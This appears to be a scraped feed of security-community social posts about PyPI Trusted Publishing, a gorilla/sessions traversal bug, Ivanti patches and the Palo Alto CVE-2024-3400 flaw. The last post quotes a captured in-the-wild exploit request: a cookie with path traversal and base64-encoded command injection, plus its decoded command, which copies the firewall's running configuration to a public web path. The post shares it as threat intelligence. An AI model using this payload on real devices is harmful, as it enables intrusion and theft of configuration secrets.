@pypi now has three new Trusted Publishing, thanks (in part) to our work at @trailofbits! This realizes our goal of expanding Trusted Publishing to compute environments outside of GitHub Actions:
https://blog.pypi.org/posts/2024-04-17-expanding-trusted-publisher-support/
The #golang `gorilla/sessions` directory traversal and file (over)write is now being tracked as GO-2024-2730: https://go-review.googlesource.com/c/vulndb/+/579655
This issue was (co)-discovered as part of watchTowr's analysis of the Palo Alto Networks RCE (#CVE_2024_3400), but is entirely separate, and affects a wide range of Go-based web services.
https://github.com/golang/vulndb/issues/2730
If you use gorilla/sessions with the FilesystemStore, please switch to the CookieStore instead until a patch is available.
Slides of my @cansecwest talk are now published!
This device runs pure bare metal Go code, all reproducible, outmost transparency even if Secure Booted and locked down.
Your SBOM is go.mod and not a single line of C in sight, all memory safe.
Slides: https://github.com/abarisani/abarisani.github.io/tree/master/research/witness
The idea a vendor would suggest that only configurations with telemetry on were vulnerable and then have to walk that back is amazing. The USG needs to go on record and provide stable advice to people that these boxes should not be used and are not patchable. Being trustworthy sometimes means you have to annoy a vendor.
I’ve seen and talked to a number of people who don't feel that having a website is for them because they have nothing to share or put there ☹️. For many, having a website seems to mean having a "blog”, but I’m here to say that having a website *isn't* about blogging, it's about YOU.
https://shellsharks.com/notes/2024/04/17/having-a-website-is-about-you
Inside is a quick, hopefully mildly motivating writeup on things you can put on a personal website that have almost nothing to do with publishing "blog" content.
urllib3, #Python's most-used HTTP client library, is fundraising to add HTTP/2 support and ensure long-term sustainability of the project.
Retoots and shares are appreciated 🙏
https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support
Happy #PatchTuesday from Ivanti. Security Update for Ivanti Avalanche 6.4.3 addresses a whopping 27 vulnerabilities with CVE-2024-29204 (heap overflow to remote code execution) being a 9.8 critical. No mention of exploitation. 🔗https://forums.ivanti.com/s/article/Avalanche-6-4-3-Security-Hardening-and-CVEs-addressed?language=en_US and blog post https://www.ivanti.com/blog/security-update-for-ivanti-avalanche
NEW: A crypto wallet maker said it had "credible intelligence" that hackers could target iPhone users with a zero-day, and even recommended turning off iMessage.
But the "credible intelligence" was actually just an ad on a scammy-looking dark web site.
Zero-days exist and it's good for people to be aware, but this post went viral and basically just spread FUD.
Nice one! The usual clusterfuck LOLOL Not stripping Go binaries also a great idea LOLOLOl
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
From hackinglz on the Nazi site:
Since it's out there now this is what I caught in wild CVE-2024-3400
GET /global-protect/login.esp HTTP/1.1 Host: X User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive Cookie: SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/`echo${IFS}dGFyIC1jemYgL3Zhci9hcHB3ZWIvc3NsdnBuZG9jcy9nbG9iYWwtcHJvdGVjdC9wb3J0YWwvanMvanF1ZXJ5Lm1heC5qcyAvb3B0L3BhbmNmZy9tZ210L3NhdmVkLWNvbmZpZ3MvcnVubmluZy1jb25maWcueG1s|base64${IFS}-d|bash${IFS}-i`
b64 decoded
tar -czf /var/appweb/sslvpndocs/global-protect/portal/js/jquery.max.js /opt/pancfg/mgmt/saved-configs/running-config.xml
Taring running config to world readable location in /global-protect/portal/js/jquery.max.js